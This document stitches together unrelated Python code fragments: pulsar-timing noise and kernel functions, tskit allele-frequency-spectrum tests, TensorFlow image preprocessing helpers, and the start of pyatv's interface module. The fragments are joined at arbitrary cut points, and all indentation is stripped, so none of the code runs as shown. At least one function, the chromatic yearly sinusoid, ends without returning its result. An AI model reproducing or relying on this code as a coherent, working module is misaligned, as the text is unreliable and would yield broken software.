def dmx_ridge_prior(avetoas, log10_sigma=-7):
sigma = 10**log10_sigma
return sigma**2 * np.ones_like(avetoas)
# quasi-periodic kernel for DM
@signal_base.function
def periodic_kernel(avetoas, log10_sigma=-7, log10_ell=2, gam_p=1, p=1):
r = np.abs(avetoas[None, :] - avetoas[:, None])
# convert units to seconds
sigma = 10**log10_sigma
l = 10**log10_ell * const.day
p *= 3.16e7
d = np.eye(r.shape[0]) * (sigma/500)**2
K = sigma**2 * np.exp(-r**2/2/l**2 - gam_p*np.sin(np.pi*r/p)**2) + d
return K
# squared-exponential kernel for FD
@signal_base.function
def se_kernel(avefreqs, log10_sigma=-7, log10_lam=np.log10(1000)):
tm = np.abs(avefreqs[None, :] - avefreqs[:, None])
lam = 10**log10_lam
sigma = 10**log10_sigma
d = np.eye(tm.shape[0]) * (sigma/500)**2
return sigma**2 * np.exp(-tm**2/2/lam) + d
# quantization matrix in time and radio frequency to cut down on the kernel size.
@signal_base.function
def get_tf_quantization_matrix(toas, freqs, dt=30*const.day, df=None, dm=False):
if df is None:
dfs = [(600, 1000), (1000, 1900), (1900, 3000), (3000, 5000)]
else:
fmin = freqs.min()
fmax = freqs.max()
fs = np.arange(fmin, fmax+df, df)
dfs = [(fs[ii], fs[ii+1]) for ii in range(len(fs)-1)]
Us, avetoas, avefreqs, masks = [], [], [], []
for rng in dfs:
mask = np.logical_and(freqs>=rng[0], freqs<rng[1])
if any(mask):
masks.append(mask)
U, _ = utils.create_quantization_matrix(toas[mask],
dt=dt, nmin=1)
avetoa = np.array([toas[mask][idx.astype(bool)].mean()
for idx in U.T])
avefreq = np.array([freqs[mask][idx.astype(bool)].mean()
for idx in U.T])
Us.append(U)
avetoas.append(avetoa)
avefreqs.append(avefreq)
nc = np.sum(U.shape[1] for U in Us)
U = np.zeros((len(toas), nc))
avetoas = np.concatenate(avetoas)
idx = np.argsort(avetoas)
avefreqs = np.concatenate(avefreqs)
nctot = 0
for ct, mask in enumerate(masks):
Umat = Us[ct]
nn = Umat.shape[1]
U[mask, nctot:nn+nctot] = Umat
nctot += nn
if dm:
weights = (1400/freqs)**2
else:
weights = np.ones_like(freqs)
return U[:, idx] * weights[:, None], {'avetoas': avetoas[idx],
'avefreqs': avefreqs[idx]}
# kernel is the product of a quasi-periodic time kernel and
# a rational-quadratic frequency kernel.
@signal_base.function
def tf_kernel(labels, log10_sigma=-7, log10_ell=2, gam_p=1,
p=1, log10_ell2=4, alpha_wgt=2):
avetoas = labels['avetoas']
avefreqs = labels['avefreqs']
r = np.abs(avetoas[None, :] - avetoas[:, None])
r2 = np.abs(avefreqs[None, :] - avefreqs[:, None])
# convert units to seconds
sigma = 10**log10_sigma
l = 10**log10_ell * const.day
l2 = 10**log10_ell2
p *= 3.16e7
d = np.eye(r.shape[0]) * (sigma/500)**2
Kt = sigma**2 * np.exp(-r**2/2/l**2 - gam_p*np.sin(np.pi*r/p)**2)
Kv = (1+r2**2/2/alpha_wgt/l2**2)**(-alpha_wgt)
return Kt * Kv + d
@signal_base.function
def chrom_exp_decay(toas, freqs, log10_Amp=-7,
t0=54000, log10_tau=1.7, idx=2):
"""
Chromatic exponential-dip delay term in TOAs.
:param t0: time of exponential minimum [MJD]
:param tau: 1/e time of exponential [s]
:param log10_Amp: amplitude of dip
:param idx: index of chromatic dependence
:return wf: delay time-series [s]
"""
t0 *= const.day
tau = 10**log10_tau * const.day
wf = -10**log10_Amp * np.heaviside(toas - t0, 1) * \
np.exp(- (toas - t0) / tau)
return wf * (1400 / freqs) ** idx
@signal_base.function
def chrom_yearly_sinusoid(toas, freqs, log10_Amp=-7, phase=0, idx=2):
"""
Chromatic annual sinusoid.
:param log10_Amp: amplitude of sinusoid
:param phase: initial phase of sinusoid
:param idx: index of chromatic dependence
:return wf: delay time-series [s]
"""
wf = 10**log10_Amp * np.sin( 2 * np.pi * const.fyr * toas + phase)
def which_psrs(psrs, slice_yr=100, min_yr=3, backward=False):
"""determine pulsars to use for a time slice
:param psrs:
list of ``enterprise.Pulsar`` objects
:param slice_yr:
length of time slice in years. If slice is longer than
dataset then all time is used
:param min_yr:
minimum data length to include a pulsar in a slice (years)
:param backward:
True for backward slices
"""
if backward:
tx = np.max([p.toas.max() for p in psrs]) # last observation
t0 = tx - slice_yr*const.yr # start time of slice
else:
t0 = np.min([p.toas.min() for p in psrs]) # first observation
tx = t0 + slice_yr*const.yr # end time of slice
which = []
for p in psrs:
ms = (p.toas.min()-t0)/const.yr + min_yr
if slice_yr > ms or backward:
p.filter_data(start_time=t0/const.day, end_time=tx/const.day)
which.append(p)
return which
# sngl psr bwm model
@signal_base.function
def bwm_sngl_delay(toas, pos, log10_h=None, h=None,
sign=1.0, t0=55000):
"""
Function that calculates the pulsar-term gravitational-wave
burst-with-memory signal, as described in:
Seto et al, <NAME> and Levin, phsirkov et al, Cordes and Jenet.
The amplitude h eats up the angular response to simplify the search
space. i.e. h_this = h_bwm * B(theta, phi).
The polarization is replaced by a "sign" variable.
:param toas: Time-of-arrival measurements [s]
:param pos: Unit vector from Earth to pulsar
:param log10_h: log10 of GW strain
:param h: GW strain
:param sign: parameter to sample sign (glitch/anti-glitch)
:param t0: Burst central time [day]
:return: the waveform as induced timing residuals (seconds)
"""
if h is None and log10_h is None:
raise TypeError("specify one of 'h' or 'log10_h'")
# convert
if h is None:
h = 10**log10_h
t0 *= const.day
# Define the heaviside function
heaviside = lambda x: 0.5 * (np.sign(x) + 1)
# Return the time-series for the pulsar
return np.sign(sign) * h * heaviside(toas-t0) * (toas-t0)
def white_noise_block(vary=False):
"""
Returns the white noise block of the model:
1. EFAC per backend/receiver system
2. EQUAD per backend/receiver system
3. ECORR per backend/receiver system
:param vary:
If set to true we vary these parameters
with uniform priors. Otherwise they are set to constants
with values to be set later.
"""
# define selection by observing backend
selection = selections.Selection(selections.by_backend)
# white noise parameters
if vary:
efac = parameter.Uniform(0.01, 10.0)
equad = parameter.Uniform(-8.5, -5)
ecorr = parameter.Uniform(-8.5, -5)
else:
efac = parameter.Constant()
equad = parameter.Constant()
ecorr = parameter.Constant()
# white noise signals
ef = white_signals.MeasurementNoise(efac=efac, selection=selection)
eq = white_signals.EquadNoise(log10_equad=equad, selection=selection)
ec = white_signals.EcorrKernelNoise(log10_ecorr=ecorr, selection=selection)
# combine signals
s = ef + eq + ec
return s
def free_noise_block(prior='log-uniform', Tspan=None):
"""Returns free spectrum noise model:
1. noise PSD with 30 sampling frequencies
:param prior:
Prior on log10_A. Default if "log-uniform". Use "uniform" for
upper limits.
:param Tspan:
Sets frequency sampling f_i = i / Tspan. Default will
use overall time span for indivicual pulsar.
"""
if prior == 'uniform':
log10_rho = parameter.LinearExp(-9, -4, size=30)
elif prior == 'log-uniform':
log10_rho = parameter.Uniform(-9, -4, size=30)
spect = free_spectrum(log10_rho=log10_rho)
fn = gp_signals.FourierBasisGP(spect, components=30, Tspan=Tspan)
return fn
def red_noise_block(prior='log-uniform', Tspan=None):
"""
Returns red noise model:
1. Red noise modeled as a power-law with 30 sampling frequencies
:param prior:
Prior on log10_A. Default if "log-uniform". Use "uniform" for
upper limits.
:param Tspan:
Sets frequency sampling f_i = i / Tspan. Default will
use overall time span for indivicual pulsar.
"""
# red noise parameters
if prior == 'uniform':
log10_A = parameter.LinearExp(-20, -11)
elif prior == 'log-uniform':
log10_A = parameter.Uniform(-20, -11)
else:
raise ValueError('Unknown prior for red noise amplitude!')
gamma = parameter.Uniform(0, 7)
# red noise signal
pl = utils.powerlaw(log10_A=log10_A, gamma=gamma)
rn = gp_signals.FourierBasisGP(pl, components=30, Tspan=Tspan)
return rn
def dm_noise_block(gp_kernel='diag', psd='powerlaw', nondiag_kernel='periodic',
prior='log-uniform', Tspan=None, components=30, gamma_val=None):
"""
Returns DM noise model:
1. DM noise modeled as a power-law with 30 sampling frequencies
:param psd:
PSD function [e.g. powerlaw (default), turnover, free spectrum]
:param prior:
Prior on log10_A. Default if "log-uniform". Use "uniform" for
upper limits.
:param Tspan:
Sets frequency sampling f_i = i / Tspan. Default will
use overall time span for indivicual pulsar.
:param components:
Number of frequencies in sampling of DM-variations.
:param gamma_val:
If given, this is the fixed slope of the power-law for
powerlaw or turnover DM-variations
"""
# dm noise parameters that are common
if gp_kernel == 'diag':
if psd in ['powerlaw', 'turnover']:
# parameters shared by PSD functions
if prior == 'uniform':
log10_A_dm = parameter.LinearExp(-20, -11)
elif prior == | |
= 0
for edge in edges_in:
u = edge.child
v = edge.parent
parent[u] = v
branch_length[u] = time[v] - time[u]
while v != -1:
update_result(window_index, v, t_left)
count[v] += count[u]
v = parent[v]
# Update the windows
while window_index < num_windows and windows[window_index + 1] <= t_right:
w_right = windows[window_index + 1]
# This seems like a bad idea as we incur a O(N) cost for each window,
# where N is the number of nodes. It might be hard to do much better
# though, since we can't help but incur O(|sample_set|) cost at each window
# which we'll assume is O(n), and for large n, N isn't much larger than n.
# For K > 1 dimensions, the cost of the scan through the nodes is much
# less than the O(n^K) required to copy (if n is large and K is small).
# We could keep track of the roots and do a tree traversal, bringing this
# down to O(n), but this adds a lot of complexity and memory and I'm
# fairly confident would be slower overall. We could keep a set of
# non-zero branches, but this would add a O(log n) cost to each edge
# insertion and removal and a lot of complexity to the C implementation.
for u in range(ts.num_nodes):
update_result(window_index, u, w_right)
window_index += 1
tree_index += 1
assert window_index == windows.shape[0] - 1
if span_normalise:
for j in range(num_windows):
result[j] /= windows[j + 1] - windows[j]
return result
def site_allele_frequency_spectrum(
ts, sample_sets, windows, polarised=False, span_normalise=True
):
"""
Efficient implementation of the algorithm used as the basis for the
underlying C version.
"""
windows = ts.parse_windows(windows)
num_windows = windows.shape[0] - 1
out_dim = [1 + len(sample_set) for sample_set in sample_sets]
result = np.zeros([num_windows] + out_dim)
# Add an extra sample set to count across all samples
sample_sets = list(sample_sets) + [ts.samples()]
# Number of nodes in sample_set j ancestral to each node u.
count = np.zeros((ts.num_nodes, len(sample_sets)), dtype=np.uint32)
for j in range(len(sample_sets)):
count[sample_sets[j], j] = 1
site_index = 0
mutation_index = 0
window_index = 0
sites = ts.tables.sites
mutations = ts.tables.mutations
parent = np.zeros(ts.num_nodes, dtype=np.int32) - 1
for (t_left, t_right), edges_out, edges_in in ts.edge_diffs():
for edge in edges_out:
u = edge.child
v = edge.parent
while v != -1:
count[v] -= count[u]
v = parent[v]
parent[u] = -1
for edge in edges_in:
u = edge.child
v = edge.parent
parent[u] = v
while v != -1:
count[v] += count[u]
v = parent[v]
while site_index < len(sites) and sites.position[site_index] < t_right:
assert t_left <= sites.position[site_index]
ancestral_state = sites[site_index].ancestral_state
allele_count = collections.defaultdict(
functools.partial(np.zeros, len(sample_sets), dtype=int)
)
allele_count[ancestral_state][:] = [
len(sample_set) for sample_set in sample_sets
]
while (
mutation_index < len(mutations)
and mutations[mutation_index].site == site_index
):
mutation = mutations[mutation_index]
allele_count[mutation.derived_state] += count[mutation.node]
if mutation.parent != -1:
parent_allele = mutations[mutation.parent].derived_state
allele_count[parent_allele] -= count[mutation.node]
else:
allele_count[ancestral_state] -= count[mutation.node]
mutation_index += 1
pos = sites.position[site_index]
while windows[window_index + 1] <= pos:
window_index += 1
assert windows[window_index] <= pos < windows[window_index + 1]
site_result = result[window_index]
for allele, c in dict(allele_count).items():
# Any allele monomorphic across all samples does not
# contribute to the AFS
if 0 == c[-1] or c[-1] == ts.num_samples:
del allele_count[allele]
if polarised and ancestral_state in allele_count:
del allele_count[ancestral_state]
increment = 1 if polarised else 0.5
for _allele, c in allele_count.items():
x = tuple(c[:-1])
if not polarised:
x = fold(x, out_dim)
site_result[x] += increment
site_index += 1
if span_normalise:
for j in range(num_windows):
span = windows[j + 1] - windows[j]
result[j] /= span
return result
def allele_frequency_spectrum(
ts, sample_sets, windows=None, polarised=False, mode="site", span_normalise=True
):
"""
Generalised site frequency spectrum.
"""
method_map = {
"site": site_allele_frequency_spectrum,
"branch": branch_allele_frequency_spectrum,
}
return method_map[mode](
ts,
sample_sets,
windows=windows,
polarised=polarised,
span_normalise=span_normalise,
)
class TestAlleleFrequencySpectrum(StatsTestCase, SampleSetStatsMixin):
# Derived classes define this to get a specific stats mode.
mode = None
def verify_single_sample_set(self, ts):
L = ts.sequence_length
samples = ts.samples()
a1 = ts.allele_frequency_spectrum(mode=self.mode)
a2 = ts.allele_frequency_spectrum([samples], mode=self.mode)
self.assertArrayEqual(a1, a2)
for windows in [None, (0, L), (0, L / 2, L)]:
a1 = ts.allele_frequency_spectrum(mode=self.mode, windows=windows)
a2 = ts.allele_frequency_spectrum(
[samples], mode=self.mode, windows=windows
)
self.assertArrayEqual(a1, a2)
for polarised in [True, False]:
a1 = ts.allele_frequency_spectrum(mode=self.mode, polarised=polarised)
a2 = ts.allele_frequency_spectrum(
[samples], mode=self.mode, polarised=polarised
)
self.assertArrayEqual(a1, a2)
for span_normalise in [True, False]:
a1 = ts.allele_frequency_spectrum(
mode=self.mode, span_normalise=span_normalise
)
a2 = ts.allele_frequency_spectrum(
[samples], mode=self.mode, span_normalise=span_normalise
)
self.assertArrayEqual(a1, a2)
def verify_sample_sets(self, ts, sample_sets, windows):
# print(ts.genotype_matrix())
# print(ts.draw_text())
# print("sample_sets = ", sample_sets)
windows = ts.parse_windows(windows)
for span_normalise, polarised in itertools.product(
[True, False], [True, False]
):
sfs1 = naive_allele_frequency_spectrum(
ts,
sample_sets,
windows,
mode=self.mode,
polarised=polarised,
span_normalise=span_normalise,
)
sfs2 = allele_frequency_spectrum(
ts,
sample_sets,
windows,
mode=self.mode,
polarised=polarised,
span_normalise=span_normalise,
)
sfs3 = ts.allele_frequency_spectrum(
sample_sets,
windows,
mode=self.mode,
polarised=polarised,
span_normalise=span_normalise,
)
self.assertEqual(sfs1.shape[0], len(windows) - 1)
self.assertEqual(len(sfs1.shape), len(sample_sets) + 1)
for j, sample_set in enumerate(sample_sets):
n = 1 + len(sample_set)
self.assertEqual(sfs1.shape[j + 1], n)
self.assertEqual(len(sfs1.shape), len(sample_sets) + 1)
self.assertEqual(sfs1.shape, sfs2.shape)
self.assertEqual(sfs1.shape, sfs3.shape)
if not np.allclose(sfs1, sfs3):
print()
print("sample sets", sample_sets)
print("simple", sfs1)
print("effic ", sfs2)
print("ts ", sfs3)
self.assertArrayAlmostEqual(sfs1, sfs2)
self.assertArrayAlmostEqual(sfs1, sfs3)
class TestBranchAlleleFrequencySpectrum(
TestAlleleFrequencySpectrum, TopologyExamplesMixin
):
mode = "branch"
def test_simple_example(self):
ts = msprime.simulate(6, recombination_rate=0.1, random_seed=1)
self.verify_single_sample_set(ts)
self.verify_sample_sets(ts, [range(6)], [0, 1])
self.verify_sample_sets(ts, [[0, 1]], [0, 1])
self.verify_sample_sets(ts, [[0, 1], [2, 3]], [0, 1])
self.verify_sample_sets(ts, [[0, 1, 2, 3, 4, 5]], [0, 1])
self.verify_sample_sets(ts, [[0, 1, 2], [3, 4, 5]], [0, 1])
self.verify_sample_sets(ts, [[0, 1], [2, 3], [4, 5]], [0, 1])
class TestSiteAlleleFrequencySpectrum(
TestAlleleFrequencySpectrum, MutatedTopologyExamplesMixin
):
mode = "site"
def test_simple_example(self):
ts = msprime.simulate(6, mutation_rate=0.2, random_seed=1)
self.verify_single_sample_set(ts)
self.verify_sample_sets(ts, [[0]], [0, 1])
self.verify_sample_sets(ts, [[0, 1, 2, 3, 4, 5]], [0, 1])
self.verify_sample_sets(ts, [[0, 1, 2], [3, 4, 5]], [0, 1])
self.verify_sample_sets(ts, [[0, 1], [2, 3], [4, 5]], [0, 1])
class TestBranchAlleleFrequencySpectrumProperties(StatsTestCase, TopologyExamplesMixin):
def verify(self, ts):
# If we split by tree, the sum of the AFS should be equal to the
# tree total branch length in each window
windows = ts.breakpoints(as_array=True)
S = ts.samples()
examples = [
[S],
[S[:1]],
[S[:-1]],
[S[:1], S[1:]],
[S[:1], S[:-1]],
]
if len(S) > 2:
examples += [[S[:1], S[2:], S[:3]]]
# This is the same definition that we use for segregating_sites
tbl = [
sum(
tree.branch_length(u)
for u in tree.nodes()
if 0 < tree.num_samples(u) < ts.num_samples
)
for tree in ts.trees()
]
for polarised in [True, False]:
for sample_sets in examples:
afs = ts.allele_frequency_spectrum(
sample_sets,
windows=windows,
mode="branch",
polarised=polarised,
span_normalise=True,
)
if not polarised:
afs *= 2
afs_sum = [np.sum(window) for window in afs]
self.assertArrayAlmostEqual(afs_sum, tbl)
############################################
# End of specific stats tests.
############################################
class TestWindowedTreeStat(StatsTestCase):
"""
Tests that the treewise windowing function defined here has the correct
behaviour.
"""
# TODO add more tests here covering the various windowing possibilities.
def get_tree_sequence(self):
ts = msprime.simulate(10, recombination_rate=2, random_seed=1)
self.assertGreater(ts.num_trees, 3)
return ts
def test_all_trees(self):
ts = self.get_tree_sequence()
A1 = np.ones((ts.num_trees, 1))
windows = np.array(list(ts.breakpoints()))
A2 = windowed_tree_stat(ts, A1, windows)
# print("breakpoints = ", windows)
# print(A2)
self.assertEqual(A1.shape, A2.shape)
# JK: I don't understand what we're computing here, this normalisation
# seems pretty weird.
# for tree in ts.trees():
# self.assertAlmostEqual(A2[tree.index, 0], tree.span / ts.sequence_length)
def test_single_interval(self):
ts = self.get_tree_sequence()
A1 = np.ones((ts.num_trees, 1))
windows = np.array([0, ts.sequence_length])
A2 = windowed_tree_stat(ts, A1, windows)
self.assertEqual(A2.shape, (1, 1))
# TODO: Test output
class TestSampleSets(StatsTestCase):
"""
Tests that passing sample sets in various ways gets interpreted correctly.
"""
def get_example_ts(self):
ts = msprime.simulate(10, mutation_rate=1, recombination_rate=1, random_seed=2)
assert ts.num_mutations > 0
return ts
def test_duplicate_samples(self):
ts = self.get_example_ts()
for bad_set in [[1, 1], [1, 2, 1], list(range(10)) + [9]]:
with self.assertRaises(exceptions.LibraryError):
ts.diversity([bad_set])
with self.assertRaises(exceptions.LibraryError):
ts.divergence([[0, 1], bad_set])
with self.assertRaises(ValueError):
ts.sample_count_stat([bad_set], self.identity_f(ts), 1)
def test_empty_sample_set(self):
ts = self.get_example_ts()
with self.assertRaises(ValueError):
ts.diversity([[]])
for bad_sample_sets in [[[], []], [[1], []], [[1, 2], [1], []]]:
with self.assertRaises(ValueError):
ts.diversity(bad_sample_sets)
with self.assertRaises(ValueError):
ts.divergence(bad_sample_sets)
with self.assertRaises(ValueError):
ts.sample_count_stat(bad_sample_sets, self.identity_f(ts), 1)
def test_non_samples(self):
ts = self.get_example_ts()
with self.assertRaises(exceptions.LibraryError):
ts.diversity([[ts.num_samples]])
with self.assertRaises(exceptions.LibraryError):
ts.divergence([[ts.num_samples], [1, 2]])
with self.assertRaises(ValueError):
ts.sample_count_stat([[ts.num_samples]], self.identity_f(ts), 1)
def test_span_normalise(self):
ts = self.get_example_ts()
sample_sets = [[0, 1], [2, 3, 4], [5, 6]]
windows = ts.sequence_length * np.random.uniform(size=10)
windows.sort()
windows[0] = 0.0
windows[-1] = | |
# Lint as: python2, python3
# Copyright 2020 Google LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility functions related to preprocessing inputs."""
import numpy as np
from six.moves import range
from six.moves import zip
import tensorflow as tf
def flip_dim(tensor_list, prob=0.5, dim=1):
"""Randomly flips a dimension of the given tensor.
The decision to randomly flip the `Tensors` is made together. In other words,
all or none of the images pass in are flipped.
Note that tf.random_flip_left_right and tf.random_flip_up_down isn't used so
that we can control for the probability as well as ensure the same decision
is applied across the images.
Args:
tensor_list: A list of `Tensors` with the same number of dimensions.
prob: The probability of a left-right flip.
dim: The dimension to flip, 0, 1, ..
Returns:
outputs: A list of the possibly flipped `Tensors` as well as an indicator
`Tensor` at the end whose value is `True` if the inputs were flipped and
`False` otherwise.
Raises:
ValueError: If dim is negative or greater than the dimension of a `Tensor`.
"""
random_value = tf.random.uniform([])
def flip():
flipped = []
for tensor in tensor_list:
if dim < 0 or dim >= len(tensor.get_shape().as_list()):
raise ValueError('dim must represent a valid dimension.')
flipped.append(tf.compat.v1.reverse_v2(tensor, [dim]))
return flipped
is_flipped = tf.less_equal(random_value, prob)
outputs = tf.cond(is_flipped, flip, lambda: tensor_list)
if not isinstance(outputs, (list, tuple)):
outputs = [outputs]
outputs.append(is_flipped)
return outputs
def _image_dimensions(image, rank):
"""Returns the dimensions of an image tensor.
Args:
image: A rank-D Tensor. For 3-D of shape: `[height, width, channels]`.
rank: The expected rank of the image
Returns:
A list of corresponding to the dimensions of the input image. Dimensions
that are statically known are python integers, otherwise they are integer
scalar tensors.
"""
if image.get_shape().is_fully_defined():
return image.get_shape().as_list()
else:
static_shape = image.get_shape().with_rank(rank).as_list()
dynamic_shape = tf.unstack(tf.shape(image), rank)
return [
s if s is not None else d for s, d in zip(static_shape, dynamic_shape)
]
def get_label_resize_method(label):
"""Returns the resize method of labels depending on label dtype.
Args:
label: Groundtruth label tensor.
Returns:
tf.image.ResizeMethod.BILINEAR, if label dtype is floating.
tf.image.ResizeMethod.NEAREST_NEIGHBOR, if label dtype is integer.
Raises:
ValueError: If label is neither floating nor integer.
"""
if label.dtype.is_floating:
return tf.image.ResizeMethod.BILINEAR
elif label.dtype.is_integer:
return tf.image.ResizeMethod.NEAREST_NEIGHBOR
else:
raise ValueError('Label type must be either floating or integer.')
def pad_to_bounding_box(image, offset_height, offset_width, target_height,
target_width, pad_value):
"""Pads the given image with the given pad_value.
Works like tf.image.pad_to_bounding_box, except it can pad the image
with any given arbitrary pad value and also handle images whose sizes are not
known during graph construction.
Args:
image: 3-D tensor with shape [height, width, channels]
offset_height: Number of rows of zeros to add on top.
offset_width: Number of columns of zeros to add on the left.
target_height: Height of output image.
target_width: Width of output image.
pad_value: Value to pad the image tensor with.
Returns:
3-D tensor of shape [target_height, target_width, channels].
Raises:
ValueError: If the shape of image is incompatible with the offset_* or
target_* arguments.
"""
with tf.compat.v1.name_scope(None, 'pad_to_bounding_box', [image]):
image = tf.convert_to_tensor(image, name='image')
original_dtype = image.dtype
if original_dtype != tf.float32 and original_dtype != tf.float64:
# If image dtype is not float, we convert it to int32 to avoid overflow.
image = tf.cast(image, tf.int32)
image_rank_assert = tf.Assert(
tf.logical_or(
tf.equal(tf.rank(image), 3),
tf.equal(tf.rank(image), 4)),
['Wrong image tensor rank.'])
with tf.control_dependencies([image_rank_assert]):
image -= pad_value
image_shape = image.get_shape()
is_batch = True
if image_shape.ndims == 3:
is_batch = False
image = tf.expand_dims(image, 0)
elif image_shape.ndims is None:
is_batch = False
image = tf.expand_dims(image, 0)
image.set_shape([None] * 4)
elif image.get_shape().ndims != 4:
raise ValueError('Input image must have either 3 or 4 dimensions.')
_, height, width, _ = _image_dimensions(image, rank=4)
target_width_assert = tf.Assert(
tf.greater_equal(
target_width, width),
['target_width must be >= width'])
target_height_assert = tf.Assert(
tf.greater_equal(target_height, height),
['target_height must be >= height'])
with tf.control_dependencies([target_width_assert]):
after_padding_width = target_width - offset_width - width
with tf.control_dependencies([target_height_assert]):
after_padding_height = target_height - offset_height - height
offset_assert = tf.Assert(
tf.logical_and(
tf.greater_equal(after_padding_width, 0),
tf.greater_equal(after_padding_height, 0)),
['target size not possible with the given target offsets'])
batch_params = tf.stack([0, 0])
height_params = tf.stack([offset_height, after_padding_height])
width_params = tf.stack([offset_width, after_padding_width])
channel_params = tf.stack([0, 0])
with tf.control_dependencies([offset_assert]):
paddings = tf.stack([batch_params, height_params, width_params,
channel_params])
padded = tf.pad(image, paddings)
if not is_batch:
padded = tf.squeeze(padded, axis=[0])
outputs = padded + pad_value
if outputs.dtype != original_dtype:
outputs = tf.cast(outputs, original_dtype)
return outputs
def _crop(image, offset_height, offset_width, crop_height, crop_width):
"""Crops the given image using the provided offsets and sizes.
Note that the method doesn't assume we know the input image size but it does
assume we know the input image rank.
Args:
image: an image of shape [height, width, channels].
offset_height: a scalar tensor indicating the height offset.
offset_width: a scalar tensor indicating the width offset.
crop_height: the height of the cropped image.
crop_width: the width of the cropped image.
Returns:
The cropped (and resized) image.
Raises:
ValueError: if `image` doesn't have rank of 3.
InvalidArgumentError: if the rank is not 3 or if the image dimensions are
less than the crop size.
"""
original_shape = tf.shape(image)
if len(image.get_shape().as_list()) != 3:
raise ValueError('input must have rank of 3')
original_channels = image.get_shape().as_list()[2]
rank_assertion = tf.Assert(
tf.equal(tf.rank(image), 3),
['Rank of image must be equal to 3.'])
with tf.control_dependencies([rank_assertion]):
cropped_shape = tf.stack([crop_height, crop_width, original_shape[2]])
size_assertion = tf.Assert(
tf.logical_and(
tf.greater_equal(original_shape[0], crop_height),
tf.greater_equal(original_shape[1], crop_width)),
['Crop size greater than the image size.'])
offsets = tf.cast(tf.stack([offset_height, offset_width, 0]), tf.int32)
# Use tf.slice instead of crop_to_bounding box as it accepts tensors to
# define the crop size.
with tf.control_dependencies([size_assertion]):
image = tf.slice(image, offsets, cropped_shape)
image = tf.reshape(image, cropped_shape)
image.set_shape([crop_height, crop_width, original_channels])
return image
def random_crop(image_list, crop_height, crop_width):
"""Crops the given list of images.
The function applies the same crop to each image in the list. This can be
effectively applied when there are multiple image inputs of the same
dimension such as:
image, depths, normals = random_crop([image, depths, normals], 120, 150)
Args:
image_list: a list of image tensors of the same dimension but possibly
varying channel.
crop_height: the new height.
crop_width: the new width.
Returns:
the image_list with cropped images.
Raises:
ValueError: if there are multiple image inputs provided with different size
or the images are smaller than the crop dimensions.
"""
if not image_list:
raise ValueError('Empty image_list.')
# Compute the rank assertions.
rank_assertions = []
for i in range(len(image_list)):
image_rank = tf.rank(image_list[i])
rank_assert = tf.Assert(
tf.equal(image_rank, 3), [
'Wrong rank for tensor %d in image_list [expected] [actual]', i, 3,
image_rank
])
rank_assertions.append(rank_assert)
with tf.control_dependencies([rank_assertions[0]]):
image_shape = tf.shape(image_list[0])
image_height = image_shape[0]
image_width = image_shape[1]
crop_size_assert = tf.Assert(
tf.logical_and(
tf.greater_equal(image_height, crop_height),
tf.greater_equal(image_width, crop_width)),
['Crop size greater than the image size.'])
asserts = [rank_assertions[0], crop_size_assert]
for i in range(1, len(image_list)):
image = image_list[i]
asserts.append(rank_assertions[i])
with tf.control_dependencies([rank_assertions[i]]):
shape = tf.shape(image)
height = shape[0]
width = shape[1]
height_assert = tf.Assert(
tf.equal(height, image_height), [
'Wrong height for tensor %d in image_list [expected][actual]', i,
height, image_height
])
width_assert = tf.Assert(
tf.equal(width, image_width), [
'Wrong width for tensor %d in image_list [expected][actual]', i,
width, image_width
])
asserts.extend([height_assert, width_assert])
# Create a random bounding box.
#
# Use tf.random.uniform and not numpy.random.rand as doing the former would
# generate random numbers at graph eval time, unlike the latter which
# generates random numbers at graph definition time.
with tf.control_dependencies(asserts):
max_offset_height = tf.reshape(image_height - crop_height + 1, [])
max_offset_width = tf.reshape(image_width - crop_width + 1, [])
offset_height = tf.random.uniform([],
maxval=max_offset_height,
dtype=tf.int32)
offset_width = tf.random.uniform([], maxval=max_offset_width, dtype=tf.int32)
return [_crop(image, offset_height, offset_width,
crop_height, crop_width) for image in image_list]
def get_random_scale(min_scale_factor, max_scale_factor, step_size):
"""Gets a random scale value.
Args:
min_scale_factor: Minimum scale value.
max_scale_factor: Maximum scale value.
step_size: The | |
<filename>pyatv/interface.py<gh_stars>0
"""Public interface exposed by library.
This module contains all the interfaces that represents a generic Apple TV device and
all its features.
"""
import re
import inspect
import hashlib
from typing import (
Any,
Dict,
Optional,
NamedTuple,
Callable,
TypeVar,
Tuple,
Union,
List,
)
import weakref
from abc import ABC, abstractmethod
from pyatv import const, convert, exceptions
from pyatv.const import (
Protocol,
OperatingSystem,
DeviceModel,
FeatureState,
FeatureName,
InputAction,
)
from pyatv.support import net
__pdoc__ = {}
__pdoc__["feature"] = False
_ALL_FEATURES = {} # type: Dict[int, Tuple[str, str]]
ReturnType = TypeVar("ReturnType", bound=Callable[..., Any])
class ArtworkInfo(NamedTuple):
"""Artwork information."""
bytes: bytes
mimetype: str
width: int
height: int
class FeatureInfo(NamedTuple):
"""Feature state and options."""
state: FeatureState
options: Optional[Dict[str, object]] = {}
class _ListenerProxy:
"""Proxy to call functions in a listener.
A proxy instance maintains a weak reference to a listener object and allows calling
functions in the listener. If no listener is set or the weak reference has expired,
a null-function (doing nothing) is returned so that nothing happens. This makes it
safe to call functions without having to check if either a listener has been set at
all or if the listener implements the called function.
"""
def __init__(self, listener):
"""Initialize a new ListenerProxy instance."""
self.listener = listener
def __getattr__(self, attr):
"""Dynamically find target method in listener."""
if self.listener is not None:
listener = self.listener()
if hasattr(listener, attr):
return getattr(listener, attr)
return lambda *args, **kwargs: None
class StateProducer:
"""Base class for objects announcing state changes to a listener."""
def __init__(self) -> None:
"""Initialize a new StateProducer instance."""
self.__listener: Optional[weakref.ReferenceType[Any]] = None
@property
def listener(self):
"""Return current listener object."""
return _ListenerProxy(self.__listener)
@listener.setter
def listener(self, target) -> None:
"""Change current listener object.
Set to None to remove active listener.
"""
if target is not None:
self.__listener = weakref.ref(target)
else:
self.__listener = None
def feature(index: int, name: str, doc: str) -> Callable[[ReturnType], ReturnType]:
"""Decorate functions and properties as a feature.
Note: This is an internal function.
"""
def _feat_decorator(func: ReturnType) -> ReturnType:
if index in _ALL_FEATURES:
raise Exception(
f"Index {index} collides between {name} and {_ALL_FEATURES[index]}"
)
_ALL_FEATURES[index] = (name, doc)
return func
return _feat_decorator
def _get_first_sentence_in_pydoc(obj):
doc = obj.__doc__
index = doc.find(".")
